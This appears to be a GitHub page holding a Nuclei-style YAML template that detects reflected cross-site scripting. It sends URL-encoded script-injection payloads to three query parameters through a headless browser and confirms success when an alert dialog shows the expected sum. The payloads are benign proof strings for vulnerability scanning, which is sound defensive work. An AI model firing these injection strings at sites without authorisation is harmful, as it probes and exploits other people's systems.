-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathxss-headless.yaml
54 lines (44 loc) · 1.31 KB
/
xss-headless.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
id: headless-reflected-xss
info:
name: Reflected Headless XSS
author: yar0v1t
severity: high
description: |
A cross-site scripting (XSS) vulnerability with headless mode.
headless:
- steps:
- args:
url: "{{BaseURL}}/listproducts.php?cat=1%3C%2Fscript%3E%3Cscript%3Ealert%283%2B4%29%3C%2Fscript%3E"
action: navigate
- action: waitdialog
name: reflected_cat_query
matchers:
- type: dsl
dsl:
- reflected_cat_query == true
- reflected_cat_query_message == "7" # 3+4
condition: and
- steps:
- args:
url: "{{BaseURL}}/hpp/params.php?p=valid&pp=1%3Cscript%3Ealert%281%2B1%29%3C%2Fscript%3E"
action: navigate
- action: waitdialog
name: reflected_pp_query
matchers:
- type: dsl
dsl:
- reflected_pp_query == true
- reflected_pp_query_message == "2" # 1+1
condition: and
- steps:
- args:
url: "{{BaseURL}}/widgets/knowledgebase?topicId=%3Cscript%3Ealert%284%2B4%29%3C%2Fscript%3E"
action: navigate
- action: waitdialog
name: reflected_topicId_query
matchers:
- type: dsl
dsl:
- reflected_topicId_query == true
- reflected_topicId_query_message == "8" # 4+4
condition: and